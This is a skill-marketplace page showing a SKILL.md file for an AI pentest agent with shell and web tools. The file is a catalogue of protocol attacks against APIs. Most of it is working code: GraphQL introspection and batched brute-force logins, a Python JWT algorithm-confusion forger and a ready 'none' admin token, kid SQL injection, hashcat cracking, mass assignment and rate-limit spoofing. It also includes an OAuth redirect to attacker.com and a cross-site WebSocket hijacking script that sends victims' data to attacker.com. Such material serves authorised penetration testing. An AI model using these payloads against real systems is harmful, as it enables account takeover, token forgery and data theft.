Skip to main content

pentest-protocols

Pentest: GraphQL, JWT, OAuth, WebSocket, REST API — protocol-specific attack vectors.

Informations de source

Dépôt
aurict/aurict
Dernière activité de la source
24 juin 2026 à 19:34
Langue détectée de SKILL.md
anglais
Étoiles
33
Forks
2

Options d'installation

Le prompt qui vérifie d'abord la source est sélectionné par défaut. Vous pouvez passer à une commande directe ou télécharger une copie locale.

Vérifiez les fichiers source

Lisez SKILL.md et les fichiers associés affichés par SkillsMP avant de décider de l'installer.

Affichage de SKILL.md

SKILL.md
Instructions source · Aperçu en lecture seule
name
pentest-protocols
description
Pentest: GraphQL, JWT, OAuth, WebSocket, REST API — protocol-specific attack vectors.
triggers
{"keywords":["graphql","jwt","oauth","websocket","api security","token","bearer","introspection","authorization code","refresh token"]}
auto_load_when
Testing API protocols, authentication flows, or real-time communication security
agent
pentest
tools
["Read","Bash","WebFetch"]
# Protocol Security — Attack Vectors --- ## GraphQL ### Introspection (information disclosure) ```bash # Check if introspection is enabled curl -s -X POST TARGET/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ __schema { types { name } } }"}' # Full schema dump curl -s -X POST TARGET/graphql \ -H "Content-Type: application/json" \ -d '{"query":"{ __schema { queryType { fields { name description args { name type { name } } } } } }"}' ``` ### Batch query abuse (rate limit bypass) ```json [ {"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"}, {"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"}, {"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"} ] ``` ### IDOR via GraphQL ```graphql # Try accessing other users' data by changing IDs query { user(id: "1") { email, password_hash, admin } } query { user(id: "2") { email, password_hash, admin } } ``` ### NoSQL injection via GraphQL variables ```json {"query": "query($user: String!) { login(username: $user) }", "variables": {"user": {"$gt": ""}}} ``` --- ## JWT ### Algorithm confusion (RS256 → HS256) ```python # 1. Get the server's public key from /jwks.json or /.well-known/openid-configuration # 2. Modify JWT header: {"alg": "HS256"} # 3. Sign with the PUBLIC KEY as HMAC secret import hmac, hashlib, base64, json header = base64.urlsafe_b64encode(json.dumps({"alg":"HS256","typ":"JWT"}).encode()).rstrip(b'=') payload = base64.urlsafe_b64encode(json.dumps({"sub":"admin","role":"admin"}).encode()).rstrip(b'=') sig_input = header + b'.' + payload signature = base64.urlsafe_b64encode(hmac.new(PUBLIC_KEY_BYTES, sig_input, hashlib.sha256).digest()).rstrip(b'=') forged_token = (header + b'.' + payload + b'.' + signature).decode() ``` ### None algorithm ``` # Header: {"alg":"none","typ":"JWT"} # Payload: {"sub":"admin","role":"admin"} # No signature — just append trailing dot eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9. ``` ### Key confusion (kid header injection) ```json // If kid header is used in a SQL query: {"kid": "' UNION SELECT 'secret'-- "} // If kid is a file path: {"kid": "/dev/null"} // results in empty key → sign with empty string ``` ### JWT cracking (weak secret) ```bash hashcat -a 0 -m 16500 JWT_TOKEN /usr/share/wordlists/rockyou.txt # or python3 jwt_tool.py JWT_TOKEN -C -d wordlist.txt ``` --- ## OAuth 2.0 ### Authorization code interception ``` # 1. Craft a malicious redirect_uri not on the allowlist /oauth/authorize?client_id=app&redirect_uri=https://attacker.com&response_type=code # 2. Open redirect chaining: find open redirect in allowed domain /oauth/authorize?...&redirect_uri=https://ALLOWED.com/redirect?next=https://attacker.com ``` ### State parameter CSRF ``` # If state is absent or predictable → CSRF on OAuth flow # Attacker initiates OAuth, intercepts the redirect, uses victim's code ``` ### Token leakage via Referer ``` # If access_token is in fragment (#) and page loads external resources # Token may appear in Referer header to third-party servers ``` ### Insufficient scope validation ``` # Request a token with minimal scope # Try to use it for higher-privileged operations GET /api/admin/users (with a read:profile token) ``` --- ## WebSocket ### Message tampering ```javascript // Connect and intercept: use Burp Suite WebSocket history // Or via browser console: const ws = new WebSocket('wss://TARGET/ws'); ws.onmessage = (e) => console.log(e.data); ws.send(JSON.stringify({"action": "getUser", "userId": 1})); ws.send(JSON.stringify({"action": "getUser", "userId": 2})); // IDOR ``` ### Cross-Site WebSocket Hijacking (CSWSH) ```html <!-- Host on attacker server — victim visits, their WS session is hijacked --> <script> var ws = new WebSocket('wss://TARGET/ws'); ws.onmessage = function(e) { fetch('https://attacker.com/collect?data=' + encodeURIComponent(e.data)); }; </script> ``` **Requires:** WebSocket connection authenticated only via cookies (no CSRF token). ### Authentication bypass ``` # Test if WS endpoint requires the same auth as REST # Connect to WS with no/expired token — see if messages are processed ``` --- ## REST API ### Mass assignment ```bash # Add unexpected fields to a POST/PUT request curl -X PUT TARGET/api/users/me \ -d '{"name":"user","role":"admin","isVerified":true,"credits":99999}' ``` ### HTTP verb tampering ```bash # Server may handle PATCH differently than PUT curl -X PATCH TARGET/api/resource/1 -d '{"owner_id": 2}' curl -X DELETE TARGET/api/resource/1 # unauthorized delete attempt ``` ### Parameter pollution ``` GET /api/transfer?amount=100&recipient=victim&recipient=attacker # Which recipient wins depends on the framework ``` ### API versioning abuse ``` # New version may have security fixes — old version may not GET /api/v1/users/admin (old version, possibly less restricted) GET /api/v2/users/admin (new version, better controls) ``` ### Rate limit bypass techniques ``` # IP rotation via X-Forwarded-For header spoofing X-Forwarded-For: 1.2.3.4 # User-Agent rotation # Distributed requests from different IPs ```
Voir sur GitHub